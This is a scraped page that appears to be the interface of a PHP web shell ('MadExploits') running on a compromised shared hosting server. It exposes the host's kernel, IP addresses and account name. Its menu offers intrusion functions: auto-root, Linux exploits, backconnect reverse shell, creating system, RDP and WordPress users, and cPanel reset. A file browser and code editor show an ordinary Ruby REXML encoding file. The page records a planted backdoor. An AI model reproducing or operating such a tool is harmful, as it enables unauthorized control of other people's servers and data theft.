Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
lib64 /
ruby /
1.8 /
rexml /
encodings /
[ HOME SHELL ]
Name
Size
Permission
Action
CP-1252.rb
4.04
KB
-rw-r--r--
EUC-JP.rb
595
B
-rw-r--r--
ICONV.rb
433
B
-rw-r--r--
ISO-8859-1.rb
134
B
-rw-r--r--
ISO-8859-15.rb
2.25
KB
-rw-r--r--
SHIFT-JIS.rb
647
B
-rw-r--r--
SHIFT_JIS.rb
36
B
-rw-r--r--
UNILE.rb
746
B
-rw-r--r--
US-ASCII.rb
654
B
-rw-r--r--
UTF-16.rb
793
B
-rw-r--r--
UTF-8.rb
268
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : EUC-JP.rb
module REXML module Encoding begin require 'uconv' def decode_eucjp(str) Uconv::euctou8(str) end def encode_eucjp content Uconv::u8toeuc(content) end rescue LoadError require 'nkf' EUCTOU8 = '-Ewm0' U8TOEUC = '-Wem0' def decode_eucjp(str) NKF.nkf(EUCTOU8, str) end def encode_eucjp content NKF.nkf(U8TOEUC, content) end end register("EUC-JP") do |obj| class << obj alias decode decode_eucjp alias encode encode_eucjp end end end end
Close